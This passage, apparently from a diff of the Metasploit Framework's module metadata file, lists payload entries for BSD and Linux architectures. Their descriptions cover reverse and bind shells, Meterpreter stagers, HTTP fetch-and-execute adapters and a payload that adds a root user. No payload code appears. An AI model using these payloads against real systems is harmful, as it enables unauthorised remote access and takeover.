"rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsd/x86/shell_reverse_tcp_ipv6": { + "name": "BSD Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/bsd/x86/shell_reverse_tcp_ipv6", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "vlad902 ", + "hdm " + ], + "description": "Connect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "BSD", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb", + "is_install_path": true, + "ref_name": "bsd/x86/shell_reverse_tcp_ipv6", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsdi/x86/shell/bind_tcp": { + "name": "BSDi Command Shell, Bind TCP Stager", + "fullname": "payload/bsdi/x86/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "BSDi", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsdi/x86/bind_tcp.rb", + "is_install_path": true, + "ref_name": 
"bsdi/x86/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsdi/x86/shell", + "stager_refname": "bsdi/x86/bind_tcp" + }, + "payload_bsdi/x86/shell/reverse_tcp": { + "name": "BSDi Command Shell, Reverse TCP Stager", + "fullname": "payload/bsdi/x86/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape " + ], + "description": "Spawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "BSDi", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-19 11:11:01 +0000", + "path": "/modules/payloads/stagers/bsdi/x86/reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsdi/x86/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 2, + "staged": true, + "stage_refname": "bsdi/x86/shell", + "stager_refname": "bsdi/x86/reverse_tcp" + }, + "payload_bsdi/x86/shell_bind_tcp": { + "name": "BSDi Command Shell, Bind TCP Inline", + "fullname": "payload/bsdi/x86/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "optyx " + ], + "description": "Listen for a connection and spawn a command shell", + "references": [], + "platform": "BSDi", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsdi/x86/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "bsdi/x86/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + 
"needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsdi/x86/shell_find_port": { + "name": "BSDi Command Shell, Find Port Inline", + "fullname": "payload/bsdi/x86/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "optyx " + ], + "description": "Spawn a shell on an established connection", + "references": [], + "platform": "BSDi", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsdi/x86/shell_find_port.rb", + "is_install_path": true, + "ref_name": "bsdi/x86/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_bsdi/x86/shell_reverse_tcp": { + "name": "BSDi Command Shell, Reverse TCP Inline", + "fullname": "payload/bsdi/x86/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "skape ", + "optyx " + ], + "description": "Connect back to attacker and spawn a command shell", + "references": [], + "platform": "BSDi", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/bsdi/x86/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "bsdi/x86/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/linux/http/aarch64/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/aarch64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": 
null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack " + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": "linux/aarch64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/meterpreter", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_cmd/linux/http/aarch64/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": 
"linux/aarch64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/aarch64/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/aarch64/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/aarch64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/aarch64/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/aarch64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": "linux/aarch64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/aarch64/shell", + "stager_refname": "linux/aarch64/reverse_tcp" + }, + "payload_cmd/linux/http/aarch64/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/aarch64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre" + ], + "description": "Fetch and execute an AARCH64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + 
"autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/aarch64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/aarch64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/aarch64", + "adapted_refname": "linux/aarch64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/armbe/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/armbe/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTP 
server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/armbe/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armbe/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMBE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armbe/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armbe", + "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/armbe/shell_bind_tcp": { + "name": "HTTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/armbe/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + 
"Brendan Watters", + "Spencer McIntyre", + "Balazs Bucsay @xoreipeip " + ], + "description": "Fetch and execute an ARMBE payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [ + "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armbe.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armbe/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armbe", + "adapted_refname": "linux/armbe/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/armle/adduser": { + "name": "HTTP Fetch, Linux Add User", + "fullname": "payload/cmd/linux/http/armle/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/adduser", + "staged": false + }, + "payload_cmd/linux/http/armle/exec": { + "name": "HTTP Fetch, Linux 
Execute Command", + "fullname": "payload/cmd/linux/http/armle/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Jonathan Salwan" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nExecute an arbitrary command", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/exec", + "staged": false + }, + "payload_cmd/linux/http/armle/meterpreter/bind_tcp": { + "name": "HTTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/armle/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/meterpreter/bind_tcp", + "staged": 
true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/http/armle/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/armle/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "nemo ", + "tkmru" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/meterpreter", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_cmd/linux/http/armle/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": 
true, + "ref_name": "cmd/linux/http/armle/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/armle/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/armle/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/armle/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + 
"mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/meterpreter_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/armle/shell/bind_tcp": { + "name": "HTTP Fetch, Linux dup2 Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/armle/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo " + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\ndup2 socket in r12, then execve.\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/bind_tcp" + }, + "payload_cmd/linux/http/armle/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux dup2 Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/armle/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "nemo ", + "tkmru" + 
], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/armle/shell", + "stager_refname": "linux/armle/reverse_tcp" + }, + "payload_cmd/linux/http/armle/shell_bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/armle/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ", + "hal" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect to target and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/armle/shell_reverse_tcp": { + "name": 
"HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/armle/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "civ" + ], + "description": "Fetch and execute an ARMLE payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-01-30 13:51:05 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/armle.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/armle/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/armle", + "adapted_refname": "linux/armle/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/mips64/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": 
"cmd/linux/http/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/mips64/meterpreter_reverse_https": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/mips64", + "adapted_refname": "linux/mips64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/mips64/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/mips64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute a MIPS64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 13:20:59 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/mips64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/mips64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + 
